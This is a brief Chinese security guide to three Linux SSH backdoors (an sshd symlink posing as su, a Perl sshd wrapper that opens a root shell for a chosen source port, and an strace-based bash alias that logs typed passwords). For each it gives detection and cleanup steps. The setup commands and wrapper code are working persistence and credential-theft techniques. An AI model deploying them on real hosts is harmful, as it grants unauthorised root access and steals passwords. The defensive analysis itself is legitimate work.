Linux SSH Backdoor分析排查

1、SSH后门分类

SSH后门方式有以下几种

• 软链接
• SSH Server wrapper
• SSH Keylogger

2、软链接

• 利用方法

[root@helen]# ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=2333;

• 排查方法

[root@helen]# netstat -anop

通过开发端口信息的PID查询进程路径，【ll /proc/xxxx】命令查看程序对应的路径。

• 清除后门

kill -9 pid
rm -rf 后门程序

3、SSH Server wrapper

• 利用方法

先将/usr/sbin/sshd文件mv到/usr/bin目录

[root@helen ~]# cd /usr/sbin/
[root@helen sbin]# mv sshd ../bin
[root@helen sbin]# vim sshd

再编辑sshd

#!/usr/bin/perl
exec"/bin/sh"if(getpeername(STDIN)=~/^..LF/);
exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;

再设置权限

chmod 755 sshd

攻击者：

在本机上执行socat STDIO TCP4:target_ip:22,sourceport=19526

• 排查方法

查看端口可以看到网络外链的端口

因为正常的sshd路径是在/usr/sbin/sshd，通过命令【ll /proc/xxx】查看sshd的路径路径在/usr/bin/sshd。所以断定sshd被动过手脚。

通过查看sshd文件可得知sshd的确被动过手脚。

cat /usr/sbin/sshd

• 清除后门

rm -rf /usr/sbin/sshd; mv /usr/bin/sshd ../sbin;

4、SSH Keylogger

• 利用方法

编辑当前用户下的.bashrc文件

vi /root/.bashrc

在最后面添加如下后门代码：

alias ssh='strace -o /tmp/sshpwd-`date    '+%d%h%m%s'`.log -e read,write,connect  -s2048 ssh'

【source .bashrc】命令使更改的配置生效

ssh连接或者su切换用户，输入密码时的密码，无论错误或者正确都能记录到log里

• 排查方法

排查环境变量

• 清除后门

清空增加的环境变量内容

5、参考

https://joychou.org/hostsec/linux-ssh-backdoor.html

http://pastebin.com/2NgL8SDE

http://www.jakoblell.com/blog/2014/05/07/hacking-contest-ssh-server-wrapper/

https://diogomonica.com/posts/poor-man-s-ssh-keylogger/

http://drops.wooyun.org/tips/1951